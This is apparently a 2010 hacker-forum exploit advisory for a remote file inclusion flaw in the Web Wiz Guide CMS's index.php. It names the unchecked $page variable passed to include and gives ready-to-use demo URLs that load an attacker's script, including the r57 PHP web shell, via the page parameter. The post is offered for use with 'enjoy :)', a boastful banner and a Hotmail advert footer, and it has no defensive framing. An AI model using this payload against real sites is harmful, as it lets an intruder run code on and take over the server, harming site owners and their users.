# Exploit Title: (Web Wiz Guide) Remote File Include Vulnerability # Date: 23-05-2010 # Author: kannibal615 # Software Link: N/A # Version: 2007/2008 # Tested on: PHP # CVE : N/A # Code : @@ @@ @@@@@ @@ @@ @@ @@@@@@ @@ @@ @@@@@@@ @@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@ @@@@@@@ @@@@@@@@ @@ @@@@ @@@@@@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@ @@ @@ @@ @@ @@@@@@ @@ @@ @@@@@@@ @@ @@ KANNIBAL615 ===[Exploit Name]======================================================== (Web Wiz Guide) REMOTE FILE INCLUSION ===[Found By]========================================================== == Found By : kannibal615 == Website : www.vbhacker.net/vb == Email : zn[at]live[dot]de == From : TUNISIA > TUNISIE == Thanks to : ALL VBHACKER MEMBERS ===[Exploit Info]======================================================== == CMS : Web Wiz Guide - Web Wiz Rich cms == version : 2007/2008 == risk : hight == dork : kannibal615 is the best ;) ===[Bug File]=========================================================== == Bug : ( "; include "$page"; ?> ) == Vulnerable file : index.php == Vulnerable variable : $page == == Demo : == == http://[localhost]/path/[index.php]?[$page]=[evil_script.txt???] == http://www.site.com/index.php?page=r57.txt??? == == ===[The End]============================================================= == enjoy :) == == kannibal615 Copyright 2010 == == www.vbhacker.net/vb ======================================================================= _________________________________________________________________ Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. https://signup.live.com/signup.aspx?id=60969